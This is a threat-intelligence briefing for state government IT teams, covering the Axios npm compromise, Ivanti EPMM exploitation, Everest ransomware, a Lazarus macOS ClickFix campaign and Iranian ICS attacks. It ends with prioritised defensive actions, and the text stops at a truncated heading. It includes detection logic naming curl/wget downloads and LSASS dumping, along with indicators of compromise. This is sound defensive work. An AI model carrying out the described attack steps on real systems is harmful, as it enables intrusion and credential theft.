When Supply Chains, Zero-Days, and Ransomware Converge: A Threat Briefing for State Government IT Leaders

<p><strong>Threat Assessment Level: ELEVATED (Trending HIGH)</strong></p> <p><em>Changed from MODERATE (April 20) to ELEVATED (April 21). Rationale: Simultaneous CISA supply chain alert, accelerating KEV additions (18 in 8 days), multi-actor exploitation of government mobile device management platforms, and a ransomware group posting six victims in a single day including major U.S. financial institutions.</em></p> <h2><strong>Introduction&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</strong></h2> <p>State government technology leaders face a compounding threat picture this week. On April 20, CISA issued a supply chain compromise alert for a JavaScript library embedded in thousands of web applications &mdash; including many serving constituents &mdash; while simultaneously adding eight new vulnerabilities to its Known Exploited Vulnerabilities catalog. At the same time, five separate threat actor campaigns are now exploiting Ivanti mobile device management software used across government agencies, deploying a previously unknown malware family called MISTBRICK. And the Everest ransomware group &mdash; which explicitly lists government-public-services among its targets &mdash; posted six new victims in a single day, including two major U.S. banks.</p> <p>These are not isolated events. They represent a convergence: a single supply chain compromise is simultaneously a nation-state operation, a vulnerability management crisis, and a potential incident response scenario. State agencies that treat these as separate problems will miss the full picture.</p> <p>This briefing provides the specific intelligence your teams need to act &mdash; today, this week, and this month.</p> <h2><strong>What Changed&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</strong></h2> <table> <thead> <tr> <th> <p>Date</p> </th> <th> <p>Event</p> </th> <th> <p>Why It Matters for State Government</p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong>April 21</strong></p> </td> <td> <p>Lazarus Group "Mach-O Man" macOS campaign detailed by ANY.RUN</p> </td> <td> <p>North Korean actors distributing macOS malware via fake Zoom/Teams/Meet invitations. Relevant to any executive or senior staff using Apple devices.</p> </td> </tr> <tr> <td> <p><strong>April 21</strong></p> </td> <td> <p>PUNK SPIDER / Akira ransomware actor profile updated</p> </td> <td> <p>Continued ransomware operational tempo against U.S. targets.</p> </td> </tr> <tr> <td> <p><strong>April 20</strong></p> </td> <td> <p>CISA issues Axios npm supply chain compromise alert</p> </td> <td> <p>DPRK-nexus actors trojanized the widely-used Axios HTTP client library. Any state web application using Axios may be compromised.</p> </td> </tr> <tr> <td> <p><strong>April 20</strong></p> </td> <td> <p>CISA adds 8 new CVEs to KEV catalog (18 KEVs in 8 days)</p> </td> <td> <p>Accelerating exploitation tempo. BOD 22-01 compliance timelines apply to all FCEB agencies; state agencies should mirror these timelines.</p> </td> </tr> <tr> <td> <p><strong>April 20</strong></p> </td> <td> <p>Everest ransomware posts 6 victims in one day (Citizens Bank, Frost Bank, others)</p> </td> <td> <p>Group explicitly targets government-public-services. Uses RMM tools commonly whitelisted in state environments.</p> </td> </tr> <tr> <td> <p><strong>April 19</strong></p> </td> <td> <p>Ivanti EPMM exploitation expands to 5 campaigns, MISTBRICK malware deployed</p> </td> <td> <p>CVE-2026-1281 and CVE-2026-1340 (both CVSS 9.8) now exploited by multiple unrelated threat actors against government targets across 6+ countries.</p> </td> </tr> <tr> <td> <p><strong>April 19</strong></p> </td> <td> <p>Iranian espionage campaign broadens to 17 countries</p> </td> <td> <p>MuddyWater (MOIS) custom backdoors and legitimate remote access tools targeting government, energy, utilities, education, and telecommunications.</p> </td> </tr> <tr> <td> <p><strong>April 19</strong></p> </td> <td> <p>CyberAv3ngers (IRGC-CEC) continues Rockwell PLC exploitation at U.S. water facilities</p> </td> <td> <p>Ongoing destructive Iranian ICS campaign against U.S. water and wastewater infrastructure. (Carried from prior cycle &mdash; remains active.)</p> </td> </tr> <tr> <td> <p><strong>April 19</strong></p> </td> <td> <p>APT28 (Russia/GRU) Outlook CVE-2023-23397 credential harvesting campaign updated</p> </td> <td> <p>Russian intelligence service credential theft targeting government. (Carried from prior cycle &mdash; remains active.)</p> </td> </tr> <tr> <td> <p><strong>April 19</strong></p> </td> <td> <p>Cisco Catalyst SD-WAN CVE-2026-20127 (CVSS 10.0) confirmed exploited against government</p> </td> <td> <p>Full network fabric takeover capability. (Carried from prior cycle &mdash; remains active.)</p> </td> </tr> <tr> <td> <p><strong>April 17</strong></p> </td> <td> <p>BeyondTrust CVE-2026-1731 (CVSS 9.8) exploitation delivering Meterpreter into government environments</p> </td> <td> <p>Privileged access management compromise. (Carried from prior cycle &mdash; remains active.)</p> </td> </tr> <tr> <td> <p><strong>April 16</strong></p> </td> <td> <p>CISA adds Ivanti EPMM CVEs to KEV catalog</p> </td> <td> <p>Formal confirmation of active exploitation; BOD 22-01 remediation deadlines triggered.</p> </td> </tr> </tbody> </table> <h2><strong>Threat Timeline&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</strong></h2> <table> <thead> <tr> <th> <p>Date</p> </th> <th> <p>Actor / Campaign</p> </th> <th> <p>Target Sector</p> </th> <th> <p>Key Detail</p> </th> </tr> </thead> <tbody> <tr> <td> <p>April 16</p> </td> <td> <p>Multiple actors</p> </td> <td> <p>Government, Commercial</p> </td> <td> <p>CISA adds Ivanti EPMM CVE-2026-1281 / CVE-2026-1340 to KEV catalog</p> </td> </tr> <tr> <td> <p>April 17</p> </td> <td> <p>Unknown</p> </td> <td> <p>Government</p> </td> <td> <p>BeyondTrust CVE-2026-1731 exploitation confirmed &mdash; Meterpreter payloads delivered</p> </td> </tr> <tr> <td> <p>April 17</p> </td> <td> <p>SafePay ransomware</p> </td> <td> <p>Multiple</p> </td> <td> <p>Actor profile updated &mdash; continued operations</p> </td> </tr> <tr> <td> <p>April 17</p> </td> <td> <p>DragonForce ransomware</p> </td> <td> <p>Multiple</p> </td> <td> <p>Actor profile updated &mdash; continued operations</p> </td> </tr> <tr> <td> <p>April 19</p> </td> <td> <p>Multiple (5 campaigns)</p> </td> <td> <p>Government, Financial, Transportation</p> </td> <td> <p>Ivanti EPMM exploitation expands; MISTBRICK malware deployed against government</p> </td> </tr> <tr> <td> <p>April 19</p> </td> <td> <p>MuddyWater (Iranian MOIS)</p> </td> <td> <p>Government, Energy, Utilities (17 countries)</p> </td> <td> <p>Custom backdoors + legitimate RAT abuse for espionage</p> </td> </tr> <tr> <td> <p>April 19</p> </td> <td> <p>APT28 (Russia/GRU)</p> </td> <td> <p>Government</p> </td> <td> <p>Outlook CVE-2023-23397 credential harvesting campaign updated</p> </td> </tr> <tr> <td> <p>April 19</p> </td> <td> <p>Sapphire Sleet (DPRK)</p> </td> <td> <p>Government, Healthcare, Energy, Aerospace (13 countries)</p> </td> <td> <p>Axios npm supply chain backdoor confirmed</p> </td> </tr> <tr> <td> <p>April 20</p> </td> <td> <p>CISA</p> </td> <td> <p>All sectors</p> </td> <td> <p>8 new KEVs added (18 total in 8 days) + Axios npm supply chain alert published</p> </td> </tr> <tr> <td> <p>April 20</p> </td> <td> <p>Everest ransomware</p> </td> <td> <p>Financial Services, Manufacturing</p> </td> <td> <p>6 victims posted in single day including Citizens Bank, Frost Bank</p> </td> </tr> <tr> <td> <p>April 21</p> </td> <td> <p>Lazarus Group (DPRK)</p> </td> <td> <p>Fintech, Crypto (expanding)</p> </td> <td> <p>"Mach-O Man" macOS ClickFix campaign via fake meeting invitations</p> </td> </tr> <tr> <td> <p>April 21</p> </td> <td> <p>CyberAv3ngers (Iranian IRGC-CEC)</p> </td> <td> <p>Water/Wastewater</p> </td> <td> <p>Ongoing Rockwell PLC exploitation at U.S. water facilities (carried from prior cycle)</p> </td> </tr> </tbody> </table> <h2><strong>Key Threat Analysis&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</strong></h2> <h3><strong>1. Axios npm Supply Chain Compromise &mdash; DPRK Operation with Government in the Crosshairs</strong></h3> <p>On April 20, CISA published a formal alert confirming that North Korean-nexus actors (tracked as Sapphire Sleet) trojanized the Axios HTTP client library &mdash; one of the most widely downloaded npm packages in the JavaScript ecosystem. The compromised package deployed a backdoor enabling persistent access and data exfiltration.</p> <p>This is not a theoretical risk. Intelligence confirms two separate campaigns: one targeting government, healthcare, energy, and aerospace sectors across 13 countries, attributed to a DPRK state-sponsored financial gain actor. State government web applications &mdash; constituent portals, online tax filing, benefits enrollment, licensing systems &mdash; commonly use Axios for API calls. A compromised dependency in any of these applications could provide a persistent backdoor into state networks.</p> <p><strong>The convergence problem:</strong> This single event simultaneously represents a supply chain compromise, a nation-state espionage operation, and a vulnerability management challenge. Agencies that route this to "the web team" without involving the SOC and CISO office will miss the full scope.</p> <h3><strong>2. Ivanti EPMM: From Single Exploit to Multi-Actor Feeding Frenzy</strong></h3> <p>What began as a pair of critical vulnerabilities (CVE-2026-1281 and CVE-2026-1340, both CVSS 9.8) in Ivanti Endpoint Manager Mobile has escalated into a multi-actor exploitation campaign. Intelligence now tracks <strong>five separate campaigns</strong> exploiting these CVEs, with the newest deploying a previously unknown malware family called <strong>MISTBRICK</strong> specifically against government and commercial targets across six countries.</p> <p>Both vulnerabilities enable unauthenticated remote code execution &mdash; meaning no credentials are required to compromise an exposed Ivanti EPMM instance. For state agencies using Ivanti for mobile device management (managing employee phones, tablets, and field devices), an unpatched instance is effectively an open door.</p> <p>The progression is textbook: vulnerability disclosed &rarr; CISA adds to KEV &rarr; single actor exploits &rarr; multiple actors adopt &rarr; new malware families emerge. State agencies still running unpatched Ivanti EPMM are now facing not one threat actor, but at least five.</p> <h3><strong>3. Everest Ransomware: Government-Adjacent Targeting at Scale</strong></h3> <p>The Everest ransomware group posted six new victims on April 20 alone, including two major U.S. financial institutions (Citizens Bank and Frost Bank). Since 2021, Everest claims 350 total victims, with the United States as the primary target (93 victims). The group explicitly lists <strong>government-public-services</strong> among its target sectors.</p> <p>What makes Everest particularly dangerous for state government environments is its tooling: the group simultaneously deploys <strong>AnyDesk, Atera, and Splashtop</strong> &mdash; three legitimate remote monitoring and management (RMM) tools that are commonly whitelisted in state IT environments for helpdesk and remote support purposes. This triple-RMM approach creates a significant detection blind spot: each tool individually appears legitimate, and security teams may not flag their presence.</p> <p>Additional tools in Everest's arsenal include <strong>Cobalt Strike</strong> (BEACON), <strong>Metasploit/Meterpreter</strong>, <strong>SoftPerfect NetScan</strong> for network discovery, and <strong>ProcDump</strong> for credential dumping from LSASS memory.</p> <p>The financial institution targeting is also relevant: state treasury and revenue agencies maintain banking relationships with institutions like those Everest has compromised. While no direct state government victim has been confirmed in the past 24 hours, the group's operational tempo and explicit government targeting make this a matter of when, not if.</p> <h3><strong>4. Lazarus Group macOS Campaign: Executives Are the Target</strong></h3> <p>A new Lazarus Group campaign distributes Go-based macOS malware ("Mach-O Man") through a social engineering technique called ClickFix. The attack chain: a victim receives a Telegram message from a compromised trusted contact &rarr; is directed to a fake Zoom, Teams, or Meet page &rarr; is prompted to paste a command into their terminal &rarr; a stager (teamsSDK.bin) downloads a fake application &rarr; the malware prompts for the user's password three times &rarr; harvests the macOS Keychain (stored passwords, certificates, tokens), browser sessions, and credentials &rarr; exfiltrates everything via Telegram.</p> <p>While primary targets are currently fintech and cryptocurrency firms, the technique is sector-agnostic. Senior state government leaders &mdash; CIOs, CISOs, agency directors &mdash; increasingly use macOS devices and regularly join video meetings with external parties. The social engineering vector (a message from a compromised trusted contact with a meeting link) is exactly the kind of communication that bypasses suspicion.</p> <p>This campaign also connects to earlier intelligence on <strong>BlueNoroff</strong> (a Lazarus sub-group) registering fresh command-and-control domains mimicking Zoom, Teams, and Meet platforms &mdash; infrastructure preparation that preceded this operational campaign.</p> <h3><strong>5. Iranian Espionage: Broadening Scope Across Government and Critical Infrastructure</strong></h3> <p>Two Iranian threat campaigns remain active and expanding:</p> <ul> <li><strong>MuddyWater</strong> (Iranian Ministry of Intelligence and Security &mdash; MOIS) continues espionage operations using custom backdoors and legitimate remote access tools across <strong>17 countries</strong>, targeting government, energy, utilities, education, and telecommunications sectors.</li> <li><strong>CyberAv3ngers</strong> (Iranian Islamic Revolutionary Guard Corps &mdash; Cyber Electronic Command, IRGC-CEC) continues exploiting Rockwell PLCs at U.S. water and wastewater facilities.</li> </ul> <p>For state agencies operating water treatment, wastewater, and pipeline SCADA systems, the Iranian threat is not abstract &mdash; it is operational and confirmed against U.S. targets. Four new ICS advisories were published this cycle covering AVEVA Pipeline Simulation, Delta Electronics ASDA-Soft, Horner Cscape/XL PLC, and Anviz products.</p> <h3><strong>6. Ongoing Critical Exploits (Carried from Prior Cycle)</strong></h3> <p>Three critical exploitation campaigns from the prior cycle remain active and unresolved:</p> <ul> <li><strong>Cisco Catalyst SD-WAN CVE-2026-20127 (CVSS 10.0):</strong> Confirmed active exploitation against government targets enabling full network fabric takeover. Any state agency using Cisco Catalyst SD-WAN must verify patch status immediately.</li> <li><strong>BeyondTrust CVE-2026-1731 (CVSS 9.8):</strong> Exploitation confirmed delivering Meterpreter payloads into government environments. State agencies using BeyondTrust for privileged access management face a particularly dangerous scenario: compromise of the PAM solution itself.</li> <li><strong>APT28 (Russia/GRU) Outlook CVE-2023-23397:</strong> Credential harvesting campaign updated as of April 19. Russian intelligence service actors continue targeting government entities via this well-documented NTLM credential theft vulnerability.</li> </ul> <h2><strong>Predictive Analysis: What Comes Next</strong></h2> <table> <thead> <tr> <th> <p>Scenario</p> </th> <th> <p>Probability</p> </th> <th> <p>Timeframe</p> </th> <th> <p>Basis</p> </th> </tr> </thead> <tbody> <tr> <td> <p>Additional threat actors adopt Ivanti EPMM exploitation; campaign count exceeds 5</p> </td> <td> <p><strong>HIGH (&gt;75%)</strong></p> </td> <td> <p>7 days</p> </td> <td> <p>Pattern of rapid multi-actor adoption once CVEs hit KEV; 5 campaigns already confirmed</p> </td> </tr> <tr> <td> <p>Axios npm supply chain impact expands as organizations discover compromised dependencies</p> </td> <td> <p><strong>MODERATE-HIGH (50&ndash;75%)</strong></p> </td> <td> <p>7&ndash;14 days</p> </td> <td> <p>CISA alert will trigger audits; many organizations have not yet checked</p> </td> </tr> <tr> <td> <p>Everest ransomware posts government-sector victims</p> </td> <td> <p><strong>MODERATE-HIGH (50&ndash;75%)</strong></p> </td> <td> <p>14 days</p> </td> <td> <p>6-victim day demonstrates sustained tempo; government explicitly in target set; 93 U.S. victims to date</p> </td> </tr> <tr> <td> <p>CISA issues dedicated Ivanti EPMM advisory (beyond KEV listing)</p> </td> <td> <p><strong>MODERATE (50&ndash;75%)</strong></p> </td> <td> <p>7 days</p> </td> <td> <p>Multi-actor exploitation of government targets typically triggers standalone advisory</p> </td> </tr> <tr> <td> <p>Lazarus ClickFix / Mach-O Man campaign expands beyond fintech to government executives</p> </td> <td> <p><strong>LOW-MODERATE (25&ndash;50%)</strong></p> </td> <td> <p>30 days</p> </td> <td> <p>DPRK campaigns historically broaden targeting over time; technique is sector-agnostic</p> </td> </tr> <tr> <td> <p>PRC actors (Volt Typhoon / Salt Typhoon) surface with new pre-positioning activity against state infrastructure</p> </td> <td> <p><strong>LOW-MODERATE (25&ndash;50%)</strong></p> </td> <td> <p>30 days</p> </td> <td> <p>No current intelligence (notable absence); these actors operate on long timelines with periodic bursts</p> </td> </tr> <tr> <td> <p>State agency compromised via Axios supply chain backdoor</p> </td> <td> <p><strong>LOW-MODERATE (25&ndash;50%)</strong></p> </td> <td> <p>14 days</p> </td> <td> <p>Depends on Axios adoption in state web applications; many citizen-facing portals use JavaScript frameworks with Axios dependencies</p> </td> </tr> </tbody> </table> <h2><strong>SOC Operational Guidance&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</strong></h2> <h3><strong>Detection Priorities</strong></h3> <p><strong>Priority 1 &mdash; Unauthorized RMM Tool Detection (Everest Ransomware)</strong></p> <ul> <li><strong>ATT&amp;CK:</strong> T1219 (Remote Access Software), T1486 (Data Encrypted for Impact)</li> <li><strong>Hunting hypothesis:</strong> Everest deploys AnyDesk, Atera, and Splashtop simultaneously. If your agency uses one of these legitimately, the other two should never appear. If none are authorized, any instance is suspicious.</li> <li><strong>Detection logic:</strong> Alert on execution of AnyDesk.exe, Atera*.exe, SplashtopStreamer.exe, or their service installations outside of approved IT support asset groups. Correlate with SoftPerfect NetScan execution (T1018) and ProcDump targeting LSASS (T1003.001) &mdash; these indicate active Everest operations.</li> <li><strong>Additional indicators:</strong> Cobalt Strike BEACON C2 traffic (T1071), Meterpreter sessions, and lateral movement via RMM tools to domain controllers.</li> </ul> <p><strong>Priority 2 &mdash; Ivanti EPMM Exploitation and MISTBRICK Post-Exploitation</strong></p> <ul> <li><strong>ATT&amp;CK:</strong> T1190 (Exploit Public-Facing Application), T1059 (Command and Scripting Interpreter), T1105 (Ingress Tool Transfer)</li> <li><strong>Hunting hypothesis:</strong> If your state uses Ivanti EPMM, check for unexpected outbound connections from the EPMM server, new scheduled tasks, or unfamiliar binaries in web-accessible directories. MISTBRICK is a new malware family &mdash; signatures may not yet exist in your EDR.</li> <li><strong>Detection logic:</strong> Monitor Ivanti EPMM server logs for unauthenticated API calls, unexpected file writes, and outbound connections to unfamiliar IPs. Alert on any new binary execution on the EPMM host that does not match the Ivanti software manifest.</li> <li><strong>Immediate action:</strong> If Ivanti EPMM is unpatched, assume compromise and initiate threat hunting on the host before patching.</li> </ul> <p><strong>Priority 3 &mdash; Axios npm Supply Chain Indicators</strong></p> <ul> <li><strong>ATT&amp;CK:</strong> T1195.002 (Supply Chain Compromise: Compromise Software Supply Chain), T1071.001 (Application Layer Protocol: Web Protocols)</li> <li><strong>Hunting hypothesis:</strong> Compromised Axios packages may beacon to attacker infrastructure. State web applications using Axios could be exfiltrating data without visible symptoms.</li> <li><strong>Detection logic:</strong> Block and alert on DNS queries or HTTP connections to sfrclak[.]com. Search web application dependency files (package-lock.json, yarn.lock) for references to this domain. Monitor for unexpected outbound data transfers from web application servers.</li> <li><strong>IOC to block:</strong> Domain sfrclak[.]com; SHA-1 3b8855190bfd44f2fc5f93c31f81646ce2c77f68</li> </ul> <p><strong>Priority 4 &mdash; macOS ClickFix / Lazarus Mach-O Man</strong></p> <ul> <li><strong>ATT&amp;CK:</strong> T1204.002 (User Execution: Malicious File), T1059.004 (Unix Shell), T1555.001 (Keychain), T1539 (Steal Web Session Cookie), T1036.005 (Masquerading)</li> <li><strong>Hunting hypothesis:</strong> Senior staff receiving meeting invitations via Telegram or unfamiliar channels may be targeted. The attack requires the user to paste a command into Terminal.</li> <li><strong>Detection logic:</strong> Monitor macOS endpoints for Terminal.app or iTerm2 executing curl or wget commands that download .bin or .app files. Alert on codesign --force --sign - commands (ad-hoc code signing of downloaded binaries). Monitor for Keychain access by non-standard processes. Watch for Telegram API connections from endpoints that don't have Telegram installed as an approved application.</li> <li><strong>Indicators to watch:</strong> Files named teamsSDK.bin; Cloudflare Workers domains (*.workers[.]dev) used as C2 proxies.</li> </ul> <p><strong>Priority 5 &mdash; Iranian Espionage via Legitimate Remote Access Tools</strong></p> <ul> <li><strong>ATT&amp;CK:</strong> T1133 (External Remote Services), T1078 (Valid Accounts), T1105 (Ingress Tool Transfer)</li> <li><strong>Hunting hypothesis:</strong> MuddyWater (MOIS) uses legitimate RATs to blend with normal administrative traffic. Look for remote access tool installations that were not provisioned by IT.</li> <li><strong>Detection logic:</strong> Baseline all authorized remote access tools. Alert on any new remote access software installation or execution that deviates from the baseline. Correlate with logins from unusual geographies or at unusual hours.</li> </ul> <h3><strong>Threat Hunting Queries to Prioritize This Week</strong></h3> <ol> <li><strong>RMM tool audit:</strong> Enumerate all installations of AnyDesk, Atera, Splashtop, and similar RMM tools across the enterprise. Compare against the authorized software list. Investigate any unauthorized instances.</li> <li><strong>Ivanti EPMM host forensics:</strong> If Ivanti EPMM is deployed, conduct a forensic review of the host for indicators of exploitation &mdash; new files, modified configurations, unexpected network connections.</li> <li><strong>JavaScript dependency audit:</strong> Scan all state web application repositories for Axios package references. Identify version numbers and check against CISA's clean version guidance.</li> <li><strong>macOS Keychain access review:</strong> On managed macOS endpoints, review Keychain access logs for non-standard process access patterns.</li> <li><strong>Outbound connection anomaly detection:</strong> Review firewall and proxy logs for state web application servers making connections to unfamiliar domains, particularly sfrclak[.]com and *.workers[.]dev patterns.</li> </ol> <h2><strong>Sector-Specific Defensive Priorities</strong></h2> <h3><strong>Financial Services (State Treasury, Revenue, Comptroller)</strong></h3> <p>Everest ransomware's April 20 targeting of Citizens Bank and Frost Bank is a direct signal. State treasury and revenue agencies handle billions in transactions and maintain banking relationships with institutions in Everest's crosshairs.</p> <ul> <li><strong>Immediate:</strong> Verify that RMM tools (AnyDesk, Atera, Splashtop) are not installed on financial system endpoints unless explicitly authorized. Implement application whitelisting on systems processing financial transactions.</li> <li><strong>7-Day:</strong> Review third-party banking partner security posture. Confirm that financial transaction systems are segmented from general agency networks. Ensure wire transfer authorization requires out-of-band verification.</li> <li><strong>30-Day:</strong> Conduct tabletop exercise simulating ransomware encryption of financial systems during a peak processing period (e.g., tax season, payroll cycle).</li> </ul> <h3><strong>Energy and Critical Infrastructure (Water, Wastewater, Pipeline, Transportation)</strong></h3> <p>Iranian threat actors &mdash; both MuddyWater/MOIS (espionage) and CyberAv3ngers/IRGC-CEC (destructive) &mdash; are actively targeting energy, utilities, and water systems. Four new ICS advisories cover products commonly deployed in state-operated facilities.</p> <ul> <li><strong>Immediate:</strong> Verify network segmentation between IT and OT/SCADA environments. Confirm that Rockwell PLC firmware is current and that CyberAv3ngers mitigations from prior CISA advisories are in place.</li> <li><strong>7-Day:</strong> Review patch status for AVEVA Pipeline Simulation, Delta Electronics ASDA-Soft, Horner Cscape/XL PLC, and Anviz products against the new ICS advisories. Disable unnecessary remote access to ICS/SCADA systems.</li> <li><strong>30-Day:</strong> Commission an independent assessment of ICS/SCADA security posture across all state-operated water, wastewater, and transportation control systems. Evaluate whether current monitoring covers OT network traffic anomalies.</li> </ul> <h3><strong>Healthcare (Medicaid, Public Health, State Hospitals)</strong></h3> <p>The Axios npm supply chain compromise explicitly targets healthcare among its 13-country victim set. State Medicaid portals, public health reporting systems, and hospital information systems frequently use JavaScript frameworks with Axios dependencies.</p> <ul> <li><strong>Immediate:</strong> Audit all healthcare-facing web applications for Axios npm dependencies. Prioritize Medicaid enrollment portals and public health reporting systems.</li> <li><strong>7-Day:</strong> Review access controls on systems containing Protected Health Information (PHI). Ensure that web application servers cannot make arbitrary outbound connections.</li> <li><strong>30-Day:</strong> Evaluate web application firewall (WAF) coverage for all citizen-facing healthcare portals. Implement Content Security Policy (CSP) headers to restrict script execution sources.</li> </ul> <h3><strong>Government Operations (All Agencies)</strong></h3> <p>State agencies are in the crosshairs of multiple threat vectors simultaneously: Ivanti EPMM exploitation (mobile device management), BeyondTrust exploitation (privileged access management), Cisco SD-WAN exploitation (network infrastructure), and ransomware groups explicitly targeting government.</p> <ul> <li><strong>Immediate:</strong> Confirm patch status for Ivanti EPMM (CVE-2026-1281, CVE-2026-1340), BeyondTrust (CVE-2026-1731), and Cisco Catalyst SD-WAN (CVE-2026-20127) across all agencies. These are the three highest-severity actively exploited vulnerabilities affecting government this week.</li> <li><strong>7-Day:</strong> Cross-reference the 18 KEVs added in the past 8 days against the state asset inventory. Prioritize remediation per BOD 22-01 timelines. Deploy detection rules for unauthorized RMM tool installations statewide.</li> <li><strong>30-Day:</strong> Conduct a statewide review of internet-facing appliance inventory. The dominant initial access vector has shifted from phishing to direct exploitation of perimeter appliances &mdash; VPNs, MDM servers, SD-WAN controllers, and PAM solutions. Any unpatched internet-facing appliance is now a primary attack surface.</li> </ul> <h3><strong>Aviation and Logistics (State DOT, Airports, Port Authorities)</strong></h3> <p>Ivanti EPMM exploitation campaigns now include transportation in their target set. State departments of transportation managing traffic control systems, airport authorities, and port operations face both the Ivanti MDM risk and the broader Iranian espionage campaign targeting transportation infrastructure.</p> <ul> <li><strong>Immediate:</strong> Verify Ivanti EPMM patch status for any mobile device management deployments supporting field operations (DOT inspectors, airport security, port operations).</li> <li><strong>7-Day:</strong> Review remote access configurations for transportation control systems. Ensure that field device management does not create a bridge between corporate IT and operational technology networks.</li> <li><strong>30-Day:</strong> Assess supply chain risk for logistics and transportation management software. The Axios npm compromise demonstrates that widely-used software libraries can be weaponized &mdash; transportation scheduling, fleet management, and cargo tracking systems may have similar dependencies.</li> </ul> <h2><strong>Prioritized Defense Recommendations</strong></h2> <h3><strong>IMMEDIATE (Within 24 Hours)</strong></h3> <table> <thead> <tr> <th> <p>Priority</p> </th> <th> <p>Responsible Team</p> </th> <th> <p>Action</p> </th> </tr> </thead> <tbody> <tr> <td> <p>1</p> </td> <td> <p>IT Operations</p> </td> <td> <p><strong>Verify all Ivanti EPMM instances are patched</strong> against CVE-2026-1281 and CVE-2026-1340. Five threat actor campaigns are now exploiting these vulnerabilities with a new malware family (MISTBRICK) specifically targeting government. If unpatched, assume compromise and initiate forensic review before patching.</p> </td> </tr> <tr> <td> <p>2</p> </td> <td> <p>Development / DevOps</p> </td> <td> <p><strong>Audit all state web applications for Axios npm package dependency.</strong> Pin to the verified clean version per CISA alert guidance. Search package-lock.json and yarn.lock files for references to sfrclak[.]com. Block sfrclak[.]com at DNS and web proxy.</p> </td> </tr> <tr> <td> <p>3</p> </td> <td> <p>SOC</p> </td> <td> <p><strong>Deploy detection rules for unauthorized RMM tool installations</strong> &mdash; specifically AnyDesk, Atera, and Splashtop binaries executing outside approved IT support contexts. Everest ransomware uses all three simultaneously for persistence and lateral movement.</p> </td> </tr> <tr> <td> <p>4</p> </td> <td> <p>IT Operations</p> </td> <td> <p><strong>Confirm patch status for Cisco Catalyst SD-WAN</strong> (CVE-2026-20127, CVSS 10.0) and <strong>BeyondTrust</strong> (CVE-2026-1731, CVSS 9.8). Both are under active exploitation against government targets.</p> </td> </tr> <tr> <td> <p>5</p> </td> <td> <p>SOC</p> </td> <td> <p><strong>Block the following IOCs at network boundary:</strong> Domain sfrclak[.]com (DNS sinkhole + proxy block); SHA-1 3b8855190bfd44f2fc5f93c31f81646ce2c77f68 (endpoint detection block).</p> </td> </tr> </tbody> </table> <h3><strong>7-DAY</strong></h3> <table> <thead> <tr> <th> <p>Priority</p> </th> <th> <p>Responsible Team</p> </th> <th> <p>Action</p> </th> </tr> </thead> <tbody> <tr> <td> <p>6</p> </td> <td> <p>SOC</p> </td> <td> <p><strong>Deploy macOS-specific detection</strong> for the ClickFix attack pattern: monitor for Terminal.app or iTerm2 executing curl/wget commands downloading .bin or .app files, followed by codesign --force --sign - commands. Brief executive staff on fake meeting invitation social engineering via Telegram and unfamiliar channels.</p> </td> </tr> <tr> <td> <p>7</p> </td> <td> <p>IT Operations</p> </td> <td> <p><strong>Cross-reference the 18 CISA KEV additions from the past 8 days</strong> against the statewide asset inventory. Prioritize remediation per BOD 22-01 timelines. The accelerating KEV tempo (18 in 8 days) indicates a broad exploitation wave.</p> </td> </tr> <tr> <td> <p>8</p> </td> <td> <p>SOC</p> </td> <td> <p><strong>Implement Axios supply chain IOC blocking</strong> at the endpoint layer: SHA-1 3b8855190bfd44f2fc5f93c31f81646ce2c77f68. Add sfrclak[.]com to DNS sinkhole if not already completed.</p> </td> </tr> <tr> <td> <p>9</p> </td> <td> <p>IT Operations</p> </td> <td> <p><strong>Review ICS/SCADA vendor patch status</strong> for the four new advisories: AVEVA Pipeline Simulation, Delta Electronics ASDA-Soft, Horner Cscape/XL PLC, and Anviz products. Coordinate with facility operators for maintenance window scheduling.</p> </td> </tr> <tr> <td> <p>10</p> </td> <td> <p>All Agency IT</p> </td> <td> <p><strong>Conduct statewide RMM tool inventory.</strong> Enumerate all installations of remote access and monitoring software. Remove unauthorized instances. Establish an approved RMM tool list and enforce via application control policies.</p> </td> </tr> </tbody> </table> <h3><strong>30-DAY</strong></h3> <table> <thead> <tr> <th> <p>Priority</p> </th> <th> <p>Responsible Team</p> </th> <th> <p>Action</p> </th> </tr> </thead> <tbody> <tr> <td> <p>11</p> </td> <td> <p>CISO</p> </td> <td> <p><strong>Commission an independent assessment of ICS/SCADA security posture</strong> across state-operated water, wastewater, pipeline, and transportation control systems. Iranian threat actors (MuddyWater/MOIS for espionage, CyberAv3ngers/IRGC-CEC for destructive operations) are actively targeting these systems.</p> </td> </tr> <tr> <td> <p>12</p> </td> <td> <p>CISO</p> </td> <td> <p><strong>Evaluate macOS endpoint visibility.</strong> The Lazarus Mach-O Man campaign demonstrates that macOS devices used by executives and senior staff are viable attack vectors. Assess whether current EDR coverage includes macOS Keychain access monitoring, unsigned binary execution detection, and Telegram API exfiltration detection.</p> </td> </tr> <tr> <td> <p>13</p> </td> <td> <p>CISO</p> </td> <td> <p><strong>Conduct a statewide internet-facing appliance audit.</strong> The dominant initial access vector has shifted from phishing to direct exploitation of perimeter appliances &mdash; VPN concentrators, MDM servers, SD-WAN controllers, and PAM solutions. Catalog all internet-facing appliances, verify patch currency, and evaluate whether each must be internet-exposed.</p> </td> </tr> <tr> <td> <p>14</p> </td> <td> <p>CISO / CIO</p> </td> <td> <p><strong>Tabletop exercise: ransomware during peak operations.</strong> Simulate an Everest-style ransomware attack encrypting financial transaction systems during a peak processing period. Test backup restoration, communication protocols, and decision-making under pressure. Include the scenario of RMM tools being used as the attack vector.</p> </td> </tr> <tr> <td> <p>15</p> </td> <td> <p>CISO / Legal</p> </td> <td> <p><strong>Review state cybersecurity legislation compliance posture.</strong> Legislative intelligence has been limited in recent collection cycles. Proactively review the NCSL Cybersecurity Legislation Tracker and NASCIO resources for pending state and federal requirements that may affect budget, staffing, or compliance obligations.</p> </td> </tr> </tbody> </table> <h3><strong>Executive / IR 